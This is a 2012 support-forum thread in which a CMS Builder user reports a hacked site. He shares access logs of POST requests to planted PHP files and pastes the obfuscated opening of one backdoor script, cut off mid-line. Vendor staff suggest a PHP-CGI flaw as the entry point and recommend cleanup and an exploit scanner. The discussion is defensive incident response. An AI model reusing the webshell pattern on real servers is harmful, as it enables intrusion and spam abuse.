Builder Vulnerability

12 posts by 5 authors in: Forums > CMS Builder
Last Post: May 23, 2012   (RSS)

By northernpenguin - May 15, 2012

I am using CMSB v2.1 on one of my sites. This morning around 5 am EST, the following files were added "/builder/cookiedh7.php and /mt21313196n.php. Basically they generated a pile of spam before my ISP managed to track them down.

Now they are telling me there may be a vulnerability in CMSB v2.14. All my other sites are fine.

Here are the results from the log file:
83.69.233.165 - - [15/May/2012:05:15:49 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16586 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$

83.69.233.165 - - [15/May/2012:05:15:51 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16586 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$

83.69.233.165 - - [15/May/2012:05:15:53 -0400] "POST /mt21313196n.php HTTP/1.1" 200 16651 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 F$

83.69.233.165 - - [15/May/2012:05:15:55 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/2010010$

75.92.255.29 - - [15/May/2012:05:16:50 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:51 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:52 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:52 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:53 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:54 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:55 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:56 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"

75.92.255.29 - - [15/May/2012:05:16:57 -0400] "POST /builder/cookiedh7.php HTTP/1.1" 200 34 "-" "-"


Any ideas?
--
northernpenguin
Northern Penguin Technologies

"Any sufficiently advanced technology
is indistinguishable from magic."
........Arthur C. Clarke

Re: [northernpenguin] Builder Vulnerability

By Dave - May 15, 2012

Hi northernpenguin,

The entry point was likely an old wordpress install or the recent exploit that affects PHP in CGI mode.

See the following:
http://www.php.net/archive/2012.php#id2012-05-06-1
http://www.interactivetools.com/docs/cmsbuilder/how_to_restore_hacked_sites.html

To check if your PHP is running in CGI mode go to: Admin > General Settings > Server Info (header bar) > phpinfo -or- just use this direct link: admin.php?menu=admin&action=phpinfo and then see if "Server API" says CGI

Next, if you're comfortable with the linux command-line, you can try and grep those two IPs to see what other files they've accessed or what the entry point was.

Let me know what you find out or if we can help.
Dave Edis - Senior Developer
interactivetools.com

Re: [Dave] Builder Vulnerability

By northernpenguin - May 15, 2012 - edited: May 15, 2012

Dave: Yes, Server Info says "CGI/FastCGI"

I am using cPanel, but have no access to the Linux/unix commend line.

They also accessed .htaccess (left it blank) and added some code to index.php
--
northernpenguin
Northern Penguin Technologies

"Any sufficiently advanced technology
is indistinguishable from magic."
........Arthur C. Clarke

Re: [Dave] Builder Vulnerability

By northernpenguin - May 16, 2012

Dave: This was inside a file under /builder/:


cookiedh7.php
<?php

error_reporting(0); if (count($_POST) != 2) { die(PHP_OS . "10+" . md5(0987654321)); } $veb65c0b0 = array_keys($_POST); if ($veb65c0b0[0][0] == 'l') { $vd56b6998 = $ve>


I’m almost positive it is an app within /builder/ causing this. I’ve noticed some left over files for tiny_mce, which is known to be vulnerable.
--
northernpenguin
Northern Penguin Technologies

"Any sufficiently advanced technology
is indistinguishable from magic."
........Arthur C. Clarke

Re: [northernpenguin] Builder Vulnerability

By Dave - May 16, 2012

Hi northernpenguin,

Yea I suggest removing any hacked code or files, then ask your host if anyone else was hacked or they were vulnerable to that recent PHP issue.

Then you just need to go through the site and remove all the hacked bits. If that process ends up taking too long our new exploit scanner script can help detect infected files.

There shouldn't be anything vulnerable in any of the files that came with CMSB. In every case we've seen so far it's been something else.
Dave Edis - Senior Developer
interactivetools.com

Re: [Dave] Builder Vulnerability

By northernpenguin - May 16, 2012

Thanx Dave: the only hacked file was /public_html/index.php, which I removed and replaced with a backup. Otherwise, as in my previous posting, the two files were found throughout the /builder folders. I also noticed that .htaccess was hacked.

I have to start checking my 20 other sites also now. What's the chance I can get your exploit scanner script?

Thanx for the help!

Ragi
--
northernpenguin
Northern Penguin Technologies

"Any sufficiently advanced technology
is indistinguishable from magic."
........Arthur C. Clarke

Re: [northernpenguin] Builder Vulnerability

By Damon - May 17, 2012

Hi Ragi,

Here is a link to the Exploit Scanner in the Add Ons:
http://www.interactivetools.com/add-ons/detail.php?Exploit-Scanner-1063

This application runs standalone and does not require a CMS Builder installation to be used. Just put it in the root and then go to it in the browser and it will scan all the folders and files on the site, then create a report.

It includes a 90 day money back guarantee so try it out.

And of course, as always, let us know if you have any questions. :)
Cheers,
Damon Edis - interactivetools.com

Hire me! Save time by getting our experts to help with your project.
http://www.interactivetools.com/consulting/

Re: [Damon] Builder Vulnerability

By gkornbluth - May 23, 2012 - edited: May 23, 2012

Dave, Damon et al,

The Exploit scanner sounds like a great plugin.

Especially if new exploit schemes are added to the scanner as you discover them.

Thanks for creating this.

Jerry Kornbluth
The first CMS Builder reference book is now available on-line!







Take advantage of a free 3 month trial subscription, only for CMSB users, at: http://www.thecmsbcookbook.com/trial.php

Re: [gkornbluth] Builder Vulnerability

By ross - May 23, 2012

Hi Jerry

Thanks for posting! I agree with you on the plugin too! It's great :). The plan is definitely to keep it up to date. Input from the community on new exploits is also welcomed :).
-----------------------------------------------------------
Cheers,
Ross Fairbairn - Consulting
consulting@interactivetools.com

Hire me! Save time by getting our experts to help with your project.
Template changes, advanced features, full integration, whatever you
need. Whether you need one hour or fifty, get it done fast with
Priority Consulting: http://www.interactivetools.com/consulting/